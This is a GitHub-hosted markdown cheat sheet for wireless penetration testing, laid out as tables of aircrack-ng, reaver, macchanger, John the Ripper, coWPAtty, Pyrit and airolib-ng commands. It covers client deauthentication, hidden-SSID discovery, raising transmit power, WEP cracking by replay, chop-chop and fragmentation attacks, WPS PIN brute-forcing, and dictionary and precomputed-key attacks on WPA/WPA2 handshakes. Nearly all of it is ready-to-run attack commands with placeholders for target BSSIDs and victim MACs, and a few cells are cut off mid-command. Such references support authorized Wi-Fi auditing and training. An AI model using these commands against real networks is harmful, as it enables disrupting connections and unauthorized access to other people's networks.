Skip to content

Latest commit

 

History

History
43 lines (33 loc) · 4.76 KB

wireless_penetration_testing.md

File metadata and controls

43 lines (33 loc) · 4.76 KB

Wireless Penetration Testing Cheat Sheet

Wireless Antenna

Action Command
Kill Monitor Processes airmon-ng check kill
Open Monitor Mode ifconfig wlan0 down
airmon-ng start wlan0
or
iwconfig wlan0 mode monitor
ifconfig wlan0 up
Increase Wi-Fi TX Power iw reg set B0
`iwconfig wlan0 txpower <NmW
Change Wi-Fi Channel iwconfig wlan0 channel <SetChannel(1-14)>

Find Hidden SSID

Action Command
Start Monitor Mode airmon-ng start wlan0
Find Hidden SSID airodump-ng -c <Channel> --bssid <BSSID> mon0
aireplay-ng -0 20 -a <BSSID> -c <VictimMac> mon0

WEP Cracking (via Client)

Method Command
ARP Request Replay Attack airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> mon0
macchanger --show mon0
aireplay-ng -3 -x 1000 -n 1000 -b <BSSID> -h <OurMac> mon0
aircrack-ng -b <BSSID> <PCAP_of_FileName>
Interactive Packet Replay Attack airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> mon0
macchanger --show mon0
aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> mon0
aircrack-ng -b <BSSID> <PCAP_of_FileName>
SKA (Shared Key Authentication) Cracking airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> mon0
aireplay-ng -0 10 -a <BSSID> -c <VictimMac> mon0
aircrack-ng <PCAP_of_FileName>

WEP Cracking (Clientless)

Method Command
Chop Chop Attack airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> mon0
macchanger --show mon0
aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> mon0
packetforge-ng -0 -a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
aircrack-ng <PCAP_of_FileName>
Fragmentation Attack airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> mon0
macchanger --show mon0
aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> mon0
packetforge-ng -0 -a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
aircrack-ng <PCAP_of_FileName>

WPA / WPA2 Cracking

Method Command
WPS Attack airmon-ng start wlan0
apt-get install reaver
wash -i mon0
reaver -i mon0 -b <BSSID> -vv -S
or
reaver -i mon0 -c <Channel> -b <BSSID> -p <PinCode> -vv -S
Dictionary Attack airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> mon0
aireplay-ng -0 1 -a <BSSID> -c <VictimMac> mon0
aircrack-ng -w <WordlistFile> -b <BSSID> <Handshaked_PCAP>
Crack with John The Ripper airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> mon0
aireplay-ng -0 1 -a <BSSID> -c <VictimMac> mon0
cd /pentest/passwords/john
`./john --wordlist= --rules --stdout
Crack with coWPAtty airmon-ng start wlan0
airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> mon0
aireplay-ng -0 1 -a <BSSID> -c <VictimMac> mon0
cowpatty -r <FileName> -f <Wordlist> -2 -s <SSID>
Crack with Pyrit airmon-ng start wlan0
airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> mon0
aireplay-ng -0 1 -a <BSSID> -c <VictimMac> mon0
pyrit -r <PCAP_of_FileName> -b <BSSID> -i <Wordlist> attack_passthrough
Precomputed WPA Keys Database Attack airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> mon0
aireplay-ng -0 1 -a <BSSID> -c <VictimMac> mon0
kwrite ESSID.txt
airolib-ng NEW_DB --import essid ESSID.txt
airolib-ng NEW_DB --import passwd <DictionaryFile>